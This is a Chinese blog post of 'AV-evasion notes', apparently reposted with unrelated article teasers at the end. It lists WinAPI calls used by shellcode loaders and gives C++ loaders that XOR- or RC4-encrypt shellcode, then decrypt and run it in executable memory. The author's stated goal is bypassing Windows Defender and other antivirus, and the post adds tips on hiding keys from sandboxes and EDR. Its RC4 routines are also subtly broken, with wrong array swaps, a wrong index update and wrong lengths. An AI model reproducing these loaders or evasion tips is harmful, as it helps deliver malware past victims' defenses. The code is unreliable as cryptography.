免杀笔记 -->API的整理Shellcode加密(过DeFender)

news2024/11/15 22:33:47

最近更新频率明显下降我懒,那么今天就来记录一下我们的一些常用的API的整理以及ShellCode的加密。

1.WinAPI整理

问我为什么要整理? 就是用起来的时候要左翻右翻

  :: 烦死了

1.VirtualAlloc

VirtualAlloc(NULL,sizeof(buf),MEM_COMMIT,PAGE_EXECUTE_READWRITE);
  1. 该API是LPVOID返回
  2. 其中的sizeof(buf)是你要申请的长度
  3. PAGE_EXECUTE_READWRITE这个是这块内存的属性,你可以申请一个不完整的(没那么容易被杀的,然后转换)

2.Memcpy

memcpy(p,buf,sizeof(buf));
  1. 其中p是目的地址
  2. buf是源地址
  3. sizeof(buf)是源地址的长度

3.CreateThread

CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)buffer, NULL, NULL, NULL);
  1. 第一个参数是安全属性,传入NULL默认是安全
  2. 第二个是默认堆栈大小,NULL是默认大小
  3. 第三个是指向线程执行的函数指针(存在强转)
  4. 第四个是要传递给函数的参数,NULL默认没有
  5. 第五个是默认控制线程的创建方式,NULL表示没有
  6. 最后一个是线程ID,NULL默认不需要返回ID
  7. 返回值就是HANDLE

4.VirtualProtect

VirtualProtect(p, length, PAGE_EXECUTE_READWRITE, NULL);
  1. 其中p是指向内存空间的指针
  2. 第三个参数是内存的属性

5.WriteProcessMemory

WriteProcessMemory(OriginalProcessHandle, RemoteMemory, dllpath, length, NULL);
  1. 第一个参数是原来的进程句柄
  2. 第二个参数就指定目标进程中要写入数据的起始地址
  3. 然后第三个参数就是指向要写入目标进程的数据的缓冲区的指针
  4. 第四个就是写入的长度

6.WaitForSingleObject

WaitForSingleObject(handle, INFINITE)
  1. 第一个参数就是创建完进程的handle
  2. 第二个参数直接写INFINET或者-1就好了

7.GetProcAddress

GetProcAddress(HDMDODULE,L"FUNCNAME")
  1. 第一个参数就是获取到的dll的HMODULE
  2. 第二个参数就是你要找的函数名字

8.CreateFileW

CreateFileW(L"cs.dll", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
  1. 第一个参数就是你要打开或者新建的文件(这样写的话就是默认exe同文件夹下面有cs.dll)
  2. 第二个参数就是属性(一般不会用到ALL)
  3. 第六个参数就是你要选择OPEN_EXISTING还是ALWAYS_CREATE

9.GetFileSize

GetFileSize(hFile, NULL)

这个很明显就是获取长度,这个无需多言

10.HeapAlloc

在堆上分配可读可写内存(不可执行!!!)

HeapAlloc(GetProcessHeap, HEAP_ZERO_MEMORY, length)

11.ReadFile

将文件内容写到缓冲区中

ReadFile(hFile, FileBuffer, length, &RealLength, NULL);
  1. 第一个参数是刚才的文件的句柄 
  2. 第二个是申请的内存指针
  3. 第三个是内存指针的长度
  4. 第四个是实际返回的长度(常用来判断读取到的文字)

2.ShellCode的加密

1.异或加密

这个就是可以说是ShellCode加密最简单的一集了,下面就来个最简单的加密代码

异或加密其实就是将每一个字符都和一个key或者说一个数异或,这就形成了密文。

#include<iostream>
#include<Windows.h>
using namespace std;

void encrypt(unsigned char *p , DWORD length,DWORD key)
{
	for (int i = 0; i < length; i++)
	{
		p[i] = p[i] ^ key;
		printf("%02x ", p[i]);
	}
	cout << endl;
}
void decrypt(unsigned char* p, DWORD length, DWORD key)
{
	for (int i = 0; i < length; i++)
	{
		p[i] = p[i] ^ key;
		printf("%02x ", p[i]);
	}
	cout << endl;
}


unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41";

int main()
{
	encrypt(buf, sizeof(buf), 12345);
	decrypt(buf, sizeof(buf), 12345);


	return 0;
}

 如果你想解密的话也很好办,直接再异或一次就好了(其实加密的代码完全可以再用一次)

当然了,你还可以搞难度大一点的,随机生成密钥,不过一般都不会这样操作,因为你随机生成密钥,总会有一方是无法操作的(或者说你把你的随机生成的加密密钥写到解密算法里面,不过这样感觉还不如直接传密钥)

2.RC4加密

这个加密还是用的比较多的,其实它的算法流程并没有变,变得只是我们的Key!!!

RC4的加解密需要经过两个流程

  1. RC4init
  2. RC4Cipher

我们一步一步来操作,先是RC4init

我们一般都会定义一个初始化的全局数组S 然后我们会对这个S有以下的操作

void RC4_init(unsigned char *p,unsigned char*key ,DWORD length)
{
	for (int i = 0; i < 256; i++)
	{
		s[i] = i;
	}
	int j = 0, i ;
	for (i = 0; i < 256; i++)
	{
		j = (j + p[i] + key[i]) % 256;
		char temp = p[i];
		p[i] = p[j];
		p[j] = temp;
	}
}

然后就是我们的RC4Cipher了,至于这两段代码为什么(我也布吉岛)

void RC4Cipher(unsigned char* p, char* file, unsigned char* key, DWORD length)
{
	int i = 0,j = 0;
	for (int k = 0; k< length; k++)
	{
		i = (i + 1) % 256;
		j = (i + s[i]) % 256;

		unsigned char temp = p[i];
		p[i] = p[j];
	    p[j] = temp;
		file[k] ^= s[(s[i] + s[j]) % 256];

	}
}

然后就是我们的完整代码了

#include<iostream>
#include<Windows.h>
using namespace std;

unsigned char s[256] = { 0x29 ,0x23 ,0xBE ,0x84 ,0xE1 ,0x6C ,0xD6 ,0xAE ,0x00 };
unsigned char key[256] = { 0x61 ,0x64 ,0x6D ,0x69 ,0x6E ,0x00 };
void RC4_init(unsigned char* p, unsigned char* key, DWORD length)
{
	for (int i = 0; i < 256; i++)
	{
		s[i] = i;
	}
	int j = 0, i;
	for (i = 0; i < 256; i++)
	{
		j = (j + p[i] + key[i]) % 256;
		unsigned char temp = p[i];
		p[i] = p[j];
		p[j] = temp;
	}
}

void RC4Cipher(unsigned char* p, unsigned char* file, unsigned char* key, DWORD length)
{
	int i = 0, j = 0;
	for (int k = 0; k < length; k++)
	{
		i = (i + 1) % 256;
		j = (i + s[i]) % 256;

		unsigned char temp = p[i];
		p[i] = p[j];
		p[j] = temp;
		file[k] ^= s[(s[i] + s[j]) % 256];

	}
}

void print(unsigned char* p, DWORD length)
{

	for (int i = 0; i < length; i++) {
		printf("%02x ", p[i]);
	}
	cout << endl;
}
int main()
{
	HANDLE hFile = CreateFileW(L"cs.dll", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	DWORD length = GetFileSize(hFile, NULL);
	unsigned char* FileBuffer = (unsigned char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, length);
	DWORD RealLength = 0;
	if (ReadFile(hFile, FileBuffer, length, &RealLength, NULL))
	{
		cout << "Read File Successfully" << endl;
	}
	RC4_init(s, key, sizeof(key));
	RC4Cipher(s, FileBuffer, key, sizeof(key));

	return 0;
}

我们也可以对一个shellcode加密并且解密上线看看效果,其实这里就是再执行这块内存之前,对他加了一次密(模仿提前加密好的ShellCode或者DLL),然后再对这块内存进行解密,并且执行

#include<iostream>
#include<Windows.h>
using namespace std;

/* length: 891 bytes */
unsigned char buf[] = ""

unsigned char s[256] = { 0x29 ,0x23 ,0xBE ,0x84 ,0xE1 ,0x6C ,0xD6 ,0xAE ,0x00 };
unsigned char key[256] = {0x61 ,0x64 ,0x6D ,0x69 ,0x6E ,0x00 };
void RC4_init(unsigned char* p, unsigned char* key, DWORD length)
{
	for (int i = 0; i < 256; i++)
	{
		s[i] = i;
	}
	int j = 0, i;
	for (i = 0; i < 256; i++)
	{
		j = (j + p[i] + key[i]) % 256;
		unsigned char temp = p[i];
		p[i] = p[j];
		p[j] = temp;
	}
}

void RC4Cipher(unsigned char* p, unsigned char* file, unsigned char* key, DWORD length)
{
	int i = 0, j = 0;
	for (int k = 0; k < length; k++)
	{
		i = (i + 1) % 256;
		j = (i + s[i]) % 256;

		unsigned char temp = p[i];
		p[i] = p[j];
		p[j] = temp;
		file[k] ^= s[(s[i] + s[j]) % 256];

	}
}


int main()
{

	void* p = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(p, buf, sizeof(buf));


	RC4_init(s, key, sizeof(key));
	RC4Cipher(s,(unsigned char * )p, key, sizeof(key));
	
	RC4_init(s, key, sizeof(key));
	RC4Cipher(s, (unsigned char*)p, key, sizeof(key));
	((void(*)())p)();

	return 0;
}

3.AES加密

这个目前是最好的一种shellcode加密方式,无论是对比起RC4(Defender会杀),UUDI,IPV4这些

AES是能过Defender的!!!!(就算你不分离的情况下,就算熵很大!!!)

这里我就不贴代码了,但是我能给屏幕截图,理由大家都懂(不想让他这么快被杀)

然后就是来展示一下它的效果(这个我都没做分离,熵值其实挺大的)

这也说明我们Windows Defender的查杀特点

  1. 沙箱,当你将一个文件放进虚拟机的时候,首先就去defender的沙箱跑,所以这个loader第一步就是抗沙箱(当然,这个和360的QVM比不了)
  2. 内存扫描,当你进行危险操作dump lsass,注入shellcode的时候,defender就会对这块内存进行扫描,如果你是恶意的shellcode就会查杀(当然,这个和卡巴斯基也比不了)

除了用server的defender测试,还用了实体(我同学)的环境,也是能用过的!!!!

火绒

电脑管家

当然了,还有像UUID,IPV4,IPV6这种的加密方式,但是都不如AES加密强大,当然你也可以用RSA,总之加密方法有很多,自行选择。


当然,解密的密钥是不推荐直接写在loader里面,可以分离一个xml,txt,这样的文件(这样也有天然抗沙箱的作用),因为对于强的EDR会关注你的一些函数,然后在去hook你的解密后的内存,如果不做unhook等其他操作,就会被杀! 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1946816.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

声音克隆一键本地化部署 GPT-SoVITS

文章目录 GPT-SoVITS 介绍1:GPT-SoVITS安装2:GPT-SoVITS使用2.1 人声伴奏分离,去混响去延时工具2.2 语音切分工具2.3 语音降噪工具2.4 中文批量离线ASR工具2.5 语音文本校对标注工具GPT-SoVITS 介绍 GPT-SoVITS: 是一个由RVC变声器创始人“花儿不哭”推出的免费开源项目。…

php 做一个mqtt按钮,发布触发信号

在之前博客php 做一个文件下载服务器&#xff0c;得避免跨路径工具&#xff0c;安全很重要 中加了一个按钮&#xff0c;触发物联网设备返回数据。基于mqtt开发&#xff0c;如果想知道mqtt如何搭建&#xff0c;可以看我的博客【MQTT&#xff08;1&#xff09;】服务端的搭建 效…

JavaEE - HTTP状态码

Web服务器 浏览器和服务器两端进行数据交互&#xff0c;使用的就是HTTP协议&#xff08;HTTP客⼾端和 HTTP服务器之间的交互数据 的格式&#xff09;。 Web服务器就是对HTTP协议进⾏封装,程序员不需要直接对协议进⾏操作(⾃⼰写代码去解析http协议 规则)&#xff0c;让Web开发更…

2 YOLO8的使用

1 介绍 YOLOv8是YOLO (You Only Look Once) 目标检测模型系列的最新版本&#xff0c;由Ultralytics公司开发和维护。YOLOv8是在先前版本的基础上进行的重大更新&#xff0c;不仅提升了性能&#xff0c;还增加了更多的功能&#xff0c;它不仅能够进行目标检测&#xff0c;还能完…

构建智慧水利系统,优化水资源管理:结合物联网、云计算等先进技术,打造全方位、高效的水利管理系统,实现水资源的最大化利用

本文关键词&#xff1a;智慧水利、智慧水利工程、智慧水利发展前景、智慧水利技术、智慧水利信息化系统、智慧水利解决方案、数字水利和智慧水利、数字水利工程、数字水利建设、数字水利概念、人水和协、智慧水库、智慧水库管理平台、智慧水库建设方案、智慧水库解决方案、智慧…

RBAC权限管理设置

RBAC权限管理设置 RBAC&#xff08;Role-Based Access Control&#xff0c;基于角色的访问控制&#xff09;是一种常用的访问控制机制&#xff0c;用于管理系统中的用户权限。RBAC通过将用户分配给角色&#xff0c;并将权限授予角色&#xff0c;从而控制用户对资源的访问。 基…

BUU [BSidesCF 2020]Cards

BUU [BSidesCF 2020]Cards 开题&#xff1a; 做题目之前先了解一下21点的规则&#xff1a; 二十一点玩法规则和概率在二十一点游戏中&#xff0c;拥有最高点数的玩家获胜&#xff0c;其点数必须等于或低于21点&#xff1b;超过21点的玩家称为爆牌。 2点至10点的牌以牌面的点数…

谷歌新的网站索引策略:将来可能不再为您的网站编制索引

10 年前&#xff0c;在 WordPress 上推出新博客的同时&#xff0c;Google 上的内容几乎是即时索引。 搜索引擎试图尽快向用户提供所有信息&#xff0c;这对内容创作者也有利。 然而&#xff0c;随着时间的推移&#xff0c;情况发生了变化&#xff0c;现在谷歌在索引方面变得极…

RPA软件-影刀使用

流程自动化 影刀将操作进行抽象&#xff0c;分为一下几个对象&#xff1a; 网页自动化 &#xff08;1&#xff09; 网页自动化应用场景&#xff1a;网页操作、数据抓取 &#xff08;2&#xff09; 网页操作&#xff1a;基础操作-指令操作&#xff0c;智能操作-关联元素&#…

Redis-数据的极速之旅(一)

Redis基础篇 Redis的自我介绍我的核心数据结构1.字符串&#xff08;String&#xff09;2.哈希&#xff08;Hash&#xff09;3.列表&#xff08;List&#xff09;4.集合&#xff08;Set&#xff09;5.有序集合&#xff08;Sorted Set&#xff09; 高性能原理1.Redis为什么快&…

C# VS2019 Form 图标的修改

一、 窗口的左上角图标 1、Form的属性中找到Icon项直接选择图标&#xff08;.ico&#xff09;路径,窗口左上角会自动更新选择更新的图标。 Form属性 2.发布后的exe图标

日常开发记录分享-SQL中的partition分区功能使用

文章目录 需求来源实现思路实施SQL 语句结构内部查询&#xff08;子查询&#xff09;外部查询 结果 partition的升级使用解释 验证一下看看分区 分区的一些操作1. 普通查询2. 分区表上的查询优化3. 插入数据4. 删除分区中的数据5. 分区维护操作添加新的分区删除分区重组分区 6.…

Mongodb入门介绍

文章目录 1、Mongodb&#xff1a;NoSQL数据库&#xff0c;分布式的文档型数据库2、适合场景&#xff1a;3、不适合场景&#xff1a;4、概念5、总结 1、Mongodb&#xff1a;NoSQL数据库&#xff0c;分布式的文档型数据库 2、适合场景&#xff1a; 1、web网站数据存储&#xff…

Live555源码阅读笔记:哈希表的实现

&#x1f601;博客主页&#x1f601;&#xff1a;&#x1f680;https://blog.csdn.net/wkd_007&#x1f680; &#x1f911;博客内容&#x1f911;&#xff1a;&#x1f36d;嵌入式开发、Linux、C语言、C、数据结构、音视频&#x1f36d; &#x1f923;本文内容&#x1f923;&a…

星环科技携手东华软件推出一表通报送联合解决方案

随着国家金融监督管理总局“一表通”试点工作的持续推进&#xff0c;星环科技携手东华软件推出了基于星环科技分布式分析型数据库ArgoDB和大数据基础平台TDH的一表通报送联合解决方案&#xff0c;并已在多地实施落地中得到充分验证。 星环科技与东华软件作为战略合作伙伴&…

功能性的安全性保障:TOKEN鉴权校验

1. 引言 在软件开发过程中&#xff0c;确保系统的安全性是至关重要的一环。它不仅关乎保护用户数据的完整性和隐私性&#xff0c;也是维护系统稳定运行的基石。我认为&#xff0c;从宏观角度审视&#xff0c;软件开发的安全性保障主要可分为两大类&#xff1a;功能性的安全性保…

昇思MindSpore 应用学习-DCGAN生成漫画头像-CSDN

日期 心得 昇思MindSpore 应用学习-DCGAN生成漫画头像&#xff08;AI代码学习&#xff09; DCGAN生成漫画头像 在下面的教程中&#xff0c;我们将通过示例代码说明DCGAN网络如何设置网络、优化器、如何计算损失函数以及如何初始化模型权重。在本教程中&#xff0c;使用的动…

Python从0到100(四十六):实现管理员登录及测试功能

前言&#xff1a; 零基础学Python&#xff1a;Python从0到100最新最全教程。 想做这件事情很久了&#xff0c;这次我更新了自己所写过的所有博客&#xff0c;汇集成了Python从0到100&#xff0c;共一百节课&#xff0c;帮助大家一个月时间里从零基础到学习Python基础语法、Pyth…

-XX:MaxDirectMemorySize和-Dio.netty.maxDirectMemory区别

-XX:MaxDirectMemorySize是java运行参数&#xff0c;用户控制java程序可以使用的最大直接内存&#xff08;堆外/本地&#xff09;&#xff1b; -Dio.netty.maxDirectMemory是netty运行参数&#xff0c;用户控制netty程序可以使用的最大直接内存&#xff08;堆外/本地&#xff…

SQLynx数据库管理工具

背景&#xff1a;业主对网络安全要求比较高&#xff0c;不提供VPN等远程工具&#xff0c;也不能开放3306端口到互联网。那怎么样运维数据库就是个难题&#xff1f;找到了SQLynx这个可以网页访问的数据库管理工具&#xff0c;给大家分享一下。 1.介绍 SQLynx原名SQL Studio&…